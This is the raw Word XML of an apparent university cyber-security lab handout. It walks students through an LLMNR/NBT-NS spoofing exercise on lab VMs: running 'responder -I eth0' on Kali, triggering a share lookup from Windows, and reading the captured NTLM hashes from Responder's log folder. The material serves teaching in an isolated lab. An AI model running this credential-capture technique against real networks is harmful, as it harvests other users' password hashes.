              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:right="695"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:u w:val="thick"/>
              </w:rPr>
              <w:t>10.0.2.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2318" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="03AF5B6E" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="0"/>
              <w:ind w:left="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman"/>
                <w:u w:val="none"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7953463A" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="304" w:right="296"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:u w:val="thick"/>
              </w:rPr>
              <w:t>10.0.2.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2366" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0ABA12EA" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="660" w:right="653"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:u w:val="thick"/>
              </w:rPr>
              <w:t>10.0.2.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4AEB489E" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F4DAA4B" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="218AD15F" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="93"/>
        <w:ind w:left="840" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="thick"/>
        </w:rPr>
        <w:t xml:space="preserve">Network Settings: </w:t>
      </w:r>
      <w:r>
        <w:t>Nat Network; allow all VM’s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658EDFFC" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:sectPr w:rsidR="008B5358">
          <w:pgSz w:w="11910" w:h="16840"/>
          <w:pgMar w:top="1340" w:right="0" w:bottom="1300" w:left="600" w:header="708" w:footer="1119" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3533A269" w14:textId="0CCE1AFD" w:rsidR="008B5358" w:rsidRDefault="006E4E04">
      <w:pPr>
        <w:spacing w:before="82"/>
        <w:ind w:left="840"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz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37856" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="06220761" wp14:editId="5BD81C9A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>694055</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>9727565</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6866255" cy="0"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="84" name="Lin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662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558865" id="Line 61" o:spid="_x0000_s1026" style="position:absolute;z-index:1573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4.65pt,765.95pt" to="595.3pt,76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">
                <w10:wrap anchorx="page" anchory="page"/>
              </v:line>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00280B8F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:u w:val="thick"/>
        </w:rPr>
        <w:t>Task 1: LLMNR/ NBT-NS Spoofing attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18EA6426" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="120"/>
        <w:ind w:left="839" w:right="1435"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="15738880" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6281D666" wp14:editId="2A0AEFCE">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3849649</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>723149</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="654583" cy="654202"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="15" name="image12.png" descr="Databa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2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4583" cy="6542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Link Local Multicast Name Resolution and Net-Bios Name Service is used by the windows systems when a DNS is unresolved. By issuing a unauthenticated UDP broadcast to its </w:t>
      </w:r>
      <w:r>
        <w:t>entire network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7310BCA6" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:sz w:val="37"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64222B02" w14:textId="19FB4D97" w:rsidR="008B5358" w:rsidRDefault="006E4E04">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="2722" w:right="68"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Carlito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7293440" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="009E8922" wp14:editId="7E6F96DB">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>1117600</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-130810</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="768985" cy="1059180"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="81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8985" cy="1059180"/>
                          <a:chOff x="1760" y="-206"/>
                          <a:chExt cx="1211" cy="1668"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="82" name="Picture 60" descr="Compu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60" y="-206"/>
                            <a:ext cx="1031" cy="10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" name="Picture 59" descr="Radio Waves Yellow · Free vector graphic on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27" y="617"/>
                            <a:ext cx="844" cy="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5D3F43" id="Group 58" o:spid="_x0000_s1026" style="position:absolute;margin-left:88pt;margin-top:-10.3pt;width:60.55pt;height:83.4pt;z-index:-16023040;mso-position-horizontal-relative:page" coordorigin="1760,-206" coordsize="1211,16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">
                <v:shape id="Picture 60" o:spid="_x0000_s1027" type="#_x0000_t75" alt="Computer" style="position:absolute;left:1760;top:-206;width:1031;height:10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">
                  <v:imagedata r:id="rId31" o:title="Computer"/>
                </v:shape>
                <v:shape id="Picture 59" o:spid="_x0000_s1028" type="#_x0000_t75" alt="Radio Waves Yellow · Free vector graphic on Pixabay" style="position:absolute;left:2127;top:617;width:844;height:8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">
                  <v:imagedata r:id="rId32" o:title="Radio Waves Yellow · Free vector graphic on Pixabay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39904" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5CFF81EA" wp14:editId="25E45D30">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>1863725</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-27305</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1875790" cy="525145"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="77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75790" cy="525145"/>
                          <a:chOff x="2935" y="-43"/>
                          <a:chExt cx="2954" cy="827"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="78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52" y="54"/>
                            <a:ext cx="2305" cy="4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9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84" y="351"/>
                            <a:ext cx="2305" cy="4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0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2935" y="-43"/>
                            <a:ext cx="2954" cy="8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BC7144" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
                              <w:pPr>
                                <w:spacing w:line="244" w:lineRule="exact"/>
                                <w:rPr>
                                  <w:rFonts w:ascii="Carlito"/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Carlito"/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t>ACCA6000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CFF81EA" id="Group 54" o:spid="_x0000_s1032" style="position:absolute;left:0;text-align:left;margin-left:146.75pt;margin-top:-2.15pt;width:147.7pt;height:41.35pt;z-index:15739904;mso-position-horizontal-relative:page" coordorigin="2935,-43" coordsize="2954,8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">
                <v:shape id="Picture 57" o:spid="_x0000_s1033" type="#_x0000_t75" style="position:absolute;left:3252;top:54;width:2305;height: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">
                  <v:imagedata r:id="rId35" o:title=""/>
                </v:shape>
                <v:shape id="Picture 56" o:spid="_x0000_s1034" type="#_x0000_t75" style="position:absolute;left:3584;top:351;width:2305;height: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">
                  <v:imagedata r:id="rId36" o:title=""/>
                </v:shape>
                <v:shape id="Text Box 55" o:spid="_x0000_s1035" type="#_x0000_t202" style="position:absolute;left:2935;top:-43;width:2954;height:8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zcw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fXxS/wBcvkEAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAAAAAA&#10;AAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAAAAAA&#10;AAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEA/TM3MMAAAADbAAAADwAAAAAA&#10;AAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPQCAAAAAA==&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="3FBC7144" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
                        <w:pPr>
                          <w:spacing w:line="244" w:lineRule="exact"/>
                          <w:rPr>
                            <w:rFonts w:ascii="Carlito"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Carlito"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t>ACCA6000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280B8F">
        <w:rPr>
          <w:rFonts w:ascii="Carlito"/>
        </w:rPr>
        <w:t>ACCB6000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD8CB90" w14:textId="3341420D" w:rsidR="008B5358" w:rsidRDefault="006E4E04">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:rFonts w:ascii="Carlito"/>
          <w:sz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6032" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5127E06C" wp14:editId="5334FFAC">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>2303145</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>462915</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2938780" cy="76200"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="74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38780" cy="76200"/>
                          <a:chOff x="3627" y="729"/>
                          <a:chExt cx="4628" cy="120"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="75" name="Line 53"/>
                        <wps:cNvCnPr>
                          <a:cxnSpLocks noChangeShapeType="1"/>
                        </wps:cNvCnPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="3727" y="789"/>
                            <a:ext cx="442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4A7EB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AutoShape 52"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="3627" y="729"/>
                            <a:ext cx="4628" cy="120"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 3747 3627"/>
                              <a:gd name="T1" fmla="*/ T0 w 4628"/>
                              <a:gd name="T2" fmla="+- 0 729 729"/>
                              <a:gd name="T3" fmla="*/ 729 h 120"/>
                              <a:gd name="T4" fmla="+- 0 3627 3627"/>
                              <a:gd name="T5" fmla="*/ T4 w 4628"/>
                              <a:gd name="T6" fmla="+- 0 789 729"/>
                              <a:gd name="T7" fmla="*/ 789 h 120"/>
                              <a:gd name="T8" fmla="+- 0 3747 3627"/>
                              <a:gd name="T9" fmla="*/ T8 w 4628"/>
                              <a:gd name="T10" fmla="+- 0 849 729"/>
                              <a:gd name="T11" fmla="*/ 849 h 120"/>
                              <a:gd name="T12" fmla="+- 0 3747 3627"/>
                              <a:gd name="T13" fmla="*/ T12 w 4628"/>
                              <a:gd name="T14" fmla="+- 0 729 729"/>
                              <a:gd name="T15" fmla="*/ 729 h 120"/>
                              <a:gd name="T16" fmla="+- 0 8254 3627"/>
                              <a:gd name="T17" fmla="*/ T16 w 4628"/>
                              <a:gd name="T18" fmla="+- 0 789 729"/>
                              <a:gd name="T19" fmla="*/ 789 h 120"/>
                              <a:gd name="T20" fmla="+- 0 8134 3627"/>
                              <a:gd name="T21" fmla="*/ T20 w 4628"/>
                              <a:gd name="T22" fmla="+- 0 729 729"/>
                              <a:gd name="T23" fmla="*/ 729 h 120"/>
                              <a:gd name="T24" fmla="+- 0 8134 3627"/>
                              <a:gd name="T25" fmla="*/ T24 w 4628"/>
                              <a:gd name="T26" fmla="+- 0 849 729"/>
                              <a:gd name="T27" fmla="*/ 849 h 120"/>
                              <a:gd name="T28" fmla="+- 0 8254 3627"/>
                              <a:gd name="T29" fmla="*/ T28 w 4628"/>
                              <a:gd name="T30" fmla="+- 0 789 729"/>
                              <a:gd name="T31" fmla="*/ 789 h 1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628" h="120">
                                <a:moveTo>
                                  <a:pt x="120" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="0" y="60"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="120" y="120"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="120" y="0"/>
                                </a:lnTo>
                                <a:close/>
                                <a:moveTo>
                                  <a:pt x="4627" y="60"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="4507" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4507" y="120"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4627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A7EB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9F0B12" id="Group 51" o:spid="_x0000_s1026" style="position:absolute;margin-left:181.35pt;margin-top:36.45pt;width:231.4pt;height:6pt;z-index:-15720448;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page" coordorigin="3627,729" coordsize="4628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">
                <v:line id="Line 53" o:spid="_x0000_s1027" style="position:absolute;visibility:visible;mso-wrap-style:square" from="3727,789" to="8154,7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" strokecolor="#4a7ebb"/>
                <v:shape id="AutoShape 52" o:spid="_x0000_s1028" style="position:absolute;left:3627;top:729;width:4628;height:120;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="4628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" path="m120,l,60r120,60l120,xm4627,60l4507,r,120l4627,60xe" fillcolor="#4a7ebb" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="120,729;0,789;120,849;120,729;4627,789;4507,729;4507,849;4627,789" o:connectangles="0,0,0,0,0,0,0,0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96544" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="01D9828E" wp14:editId="41849B9D">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>5499100</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>171450</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="671195" cy="466725"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="71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1195" cy="466725"/>
                          <a:chOff x="8660" y="270"/>
                          <a:chExt cx="1057" cy="735"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="72" name="Picture 50" descr="Red Flag Signal · Free vector graphic on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60" y="561"/>
                            <a:ext cx="372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3" name="Picture 49" descr="Clé Entrée Porte · Image gratuite sur Pixa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81" y="269"/>
                            <a:ext cx="736" cy="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31F022" id="Group 48" o:spid="_x0000_s1026" style="position:absolute;margin-left:433pt;margin-top:13.5pt;width:52.85pt;height:36.75pt;z-index:-15719936;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page" coordorigin="8660,270" coordsize="1057,73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">
                <v:shape id="Picture 50" o:spid="_x0000_s1027" type="#_x0000_t75" alt="Red Flag Signal · Free vector graphic on Pixabay" style="position:absolute;left:8660;top:561;width:372;height:3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">
                  <v:imagedata r:id="rId39" o:title="Red Flag Signal · Free vector graphic on Pixabay"/>
                </v:shape>
                <v:shape id="Picture 49" o:spid="_x0000_s1028" type="#_x0000_t75" alt="Clé Entrée Porte · Image gratuite sur Pixabay" style="position:absolute;left:8981;top:269;width:736;height:7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">
                  <v:imagedata r:id="rId40" o:title="Clé Entrée Porte · Image gratuite sur Pixabay"/>
                </v:shape>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="51061300" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="80"/>
        <w:ind w:left="1548"/>
        <w:rPr>
          <w:rFonts w:ascii="Carlito"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Carlito"/>
        </w:rPr>
        <w:t>ACCA6000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7113CFF9" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Carlito"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="201E6FA8" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="93"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>Login using your user credentials in Windows 7 or 10 machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AAE3E99" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19A440C3" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:spacing w:before="92"/>
        <w:ind w:left="840"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>kali@kali:~$ responder -I eth0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D552FC3" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58162B26" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="1560"/>
      </w:pPr>
      <w:r>
        <w:t>NBT-NS, LLMNR &amp; MDNS Responder 3.0.2.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65822C71" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DEFCA82" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="1560"/>
      </w:pPr>
      <w:r>
        <w:t>About this tool: Author: Laurent Gaffie (</w:t>
      </w:r>
      <w:hyperlink r:id="rId41">
        <w:r>
          <w:rPr>
            <w:color w:val="0000FF"/>
            <w:u w:val="single" w:color="0000FF"/>
          </w:rPr>
          <w:t>laurent.gaffie@gmail.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0338C6CE" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="342F7DB1" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="93"/>
        <w:ind w:left="1560" w:right="2179"/>
      </w:pPr>
      <w:r>
        <w:t>The Responder in Kali should start listening for events. Go to Win 7 PC Machine and try to access any shared folder.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF5B344" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18EAF885" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="93"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t xml:space="preserve">Eg: Win +r </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
          <w:b w:val="0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t></w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t xml:space="preserve">\\nitheesh </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
          <w:b w:val="0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t></w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>Press Enter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094CBE5E" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="602FCA87" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="1560"/>
      </w:pPr>
      <w:r>
        <w:t>Go back to Kali and look out for the logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24798798" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="655390EF" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="92"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>/usr/share/responder/logs/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51EBFBF0" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="652CFB3B" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:after="3" w:line="480" w:lineRule="auto"/>
        <w:ind w:left="1560" w:right="3887"/>
      </w:pPr>
      <w:r>
        <w:t>The file would be a txt file starting with SMB….NTLM… Open the file and you could see the hashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09AEE67F" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="1560"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1072239B" wp14:editId="05CCB6A0">
            <wp:extent cx="4293546" cy="2628900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="17" name="image19.jpeg" descr="C:\Users\n.kaliyamurthy\OneDrive - University of Wales Trinity Saint David\Modules_Handling\Sep 2020\L6 - Advanced Cyber Security (ACCB6000)\Images used in PPts\screen12112020\A110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9.jpe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93546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CD445F" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:sectPr w:rsidR="008B5358">
          <w:pgSz w:w="11910" w:h="16840"/>
          <w:pgMar w:top="1340" w:right="0" w:bottom="1300" w:left="600" w:header="708" w:footer="1119" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EC4A6C2" w14:textId="7810823D" w:rsidR="008B5358" w:rsidRDefault="006E4E04">
      <w:pPr>
        <w:spacing w:before="82" w:line="482" w:lineRule="auto"/>
        <w:ind w:left="1559" w:right="5219" w:hanging="720"/>
        <w:rPr>
          <w:i/>
          <w:sz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41440" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1986BCEB" wp14:editId="29493204">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
